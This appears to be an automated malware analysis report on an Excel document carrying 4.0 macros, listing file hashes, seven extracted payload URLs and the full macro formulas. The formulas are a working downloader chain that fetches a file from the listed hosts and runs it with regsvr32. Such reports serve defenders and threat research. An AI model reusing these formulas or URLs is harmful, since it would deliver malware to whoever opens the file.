General
-
Target
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0
-
Size
37KB
-
MD5
c48c0424f9a8fdcae930b8782d738017
-
SHA1
97c3cecb4e447b4374e3ee5614458f5abecb2c88
-
SHA256
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0
-
SHA512
bb7239fe527e698d1e15846b1de55c2a06decf0c216b17095fcdc32f415324253afe7125a91cc262ca32a1473e2683b7ed0cc7fbd9829195ee6d9b71177d4981
-
SSDEEP
768:5BnpO75ZJVzXxjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo1:30lpZOZZ1ZYpoQ/pMAQVr
Malware Config
Extracted
https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/
https://bigideas.com.au/images/w5FLAJPmvbk9/
https://webstream.jp/died-wing/oOzfVc/
https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/
https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/
https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/
https://breedid.nl/cgi-bin/aCbt/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/","..\dfeb.ses",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bigideas.com.au/images/w5FLAJPmvbk9/","..\dfeb.ses",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://webstream.jp/died-wing/oOzfVc/","..\dfeb.ses",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/","..\dfeb.ses",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/","..\dfeb.ses",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/","..\dfeb.ses",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://breedid.nl/cgi-bin/aCbt/","..\dfeb.ses",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfeb.ses") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0